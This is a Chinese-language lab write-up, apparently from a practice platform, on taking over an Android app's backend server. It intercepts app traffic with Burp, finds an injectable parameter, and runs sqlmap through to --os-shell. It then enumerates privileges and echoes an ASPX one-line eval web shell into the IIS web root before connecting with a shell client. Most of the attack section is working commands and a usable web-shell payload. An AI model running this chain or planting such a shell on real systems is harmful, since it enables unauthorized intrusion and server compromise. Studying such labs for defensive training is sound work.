从apk的SQL注入到获取shell
所有渗透都需获取授权!否则就要承担相应的法律责任。这是一个老师搭的平台,下面是自己做题的一些笔记,一些经验,希望能帮到大家,大佬请绕道忽略。如果有任何歧义全部是本人个人观点,如果有任何错误和遗漏之处,在此抱歉。我只是一个普通的菜鸟。
🔻 安装
拉入模拟器安装
设置burp抓包即可
🔻 查找注入点
burp在历史记录找到异常点
一直再跳这玩意
b815c54f68e27a76b7f97113a24540a2 为异常点
我明显没有填写这个 却出现了就很异常(必须小本本记下来)
在数据交互处找到注入点
MD5解密后得到文案号
sqlmap一把梭
python sqlmap.py -r 1.txt
python sqlmap.py -r 1.txt --batch -smart --current-db (获取当前数据库名称)
Batch:会自动选择yes 就不用手动敲y y y了
Smart:启发式快速判断,节约时间
current-db :获取当前数据库名称
python sqlmap.py -r 1.txt --batch -smart --is-dba (查看是否是数据库管理员)
🔻 --os-shell 写入
python sqlmap.py -r 1.txt --batch -smart --os-shell
🔻 小知识
有时会报错 清除缓存就行
sqlmap进行注入时会有缓存记录位置
/root/.local/share/sqlmap/output
删除:rm -rf 文件名
黑客3连
whomai(nt service\mssqlserver)
net localgroup administrators
🔻 查看网站根目录
dir d:
看来d:\website就是网站根目录
先试试echo能不能用
echo "6666666" > d:\website\777.txt
发现可以写入
那我们直接写入shell
因为是iis网站 我们就写入aspx一句话
echo "<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>" > d:\website\adt888.aspx
直接上冰蟹
到此结束成功获取shell